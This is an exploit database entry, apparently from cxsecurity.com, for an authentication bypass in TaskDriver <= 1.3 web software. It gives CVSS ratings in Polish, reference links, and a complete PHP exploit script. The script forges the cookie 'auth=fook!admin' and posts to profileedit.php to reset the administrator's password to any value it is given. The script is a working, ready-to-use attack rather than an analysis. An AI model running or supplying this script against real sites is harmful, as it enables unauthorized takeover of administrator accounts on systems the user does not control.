TaskDriver <= 1.3 Remote Change Admin Password Exploit

2009.08.10
Credit: cOndemned
Risk: High
Local: No
Remote: Yes
CWE: CWE-287


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

<?php /* $Id: taskdriver-1.3.php,v 0.1 2008/12/03 04:04:28 cOndemned Exp $ TaskDriver <= 1.3 Remote Change Admin Password Exploit Bug found && Exploited by cOndemned Download: http://www.taskdriver.com/downtrack/index.php?down=2 Description: This exploit uses insecure cookie handling flaw in order to compromisse the system. In the begining its almost like the one that Silentz wrote for version 1.2 but not exactly. Actually there is no need to use sql injection for gaining admin password (hash). We can just set cookie value to : "auth=fook!admin" access profileedit.php and change his password for whatever we want to x] Next IMO nice thing is that it works both with magic quotes on and off :P ------------------------------------------------------------------- Greetz: ZaBeaTy, Avantura, l5x, str0ke, d2, sid.psycho & TWT, 0in, doctor, Gynvael Coldwind ... http://www.youtube.com/watch?v=f7O6ekKOE9g */ echo "\n[~] TaskDriver <= 1.3 Remote Change Admin Password Exploit"; echo "\n[~] Bug found && Exploited by cOndemned\n"; if($argc != 3) { printf("[!] Usage: php %s <target> <new-password>\n\n", $argv[0]); exit; } list($script, $target, $pass) = $argv; $xpl = curl_init(); curl_setopt_array($xpl, array ( CURLOPT_URL => "{$target}/profileedit.php", CURLOPT_COOKIE => "auth=fook!admin", CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => "password={$pass}" )); $ret = curl_exec($xpl); curl_close($xpl); $out = preg_match_all('#<b>Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n"; echo $out; ?>

Referencje:

http://xforce.iss.net/xforce/xfdb/47608
http://www.securityfocus.com/bid/33030
http://www.milw0rm.com/exploits/7605
http://secunia.com/advisories/25221


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top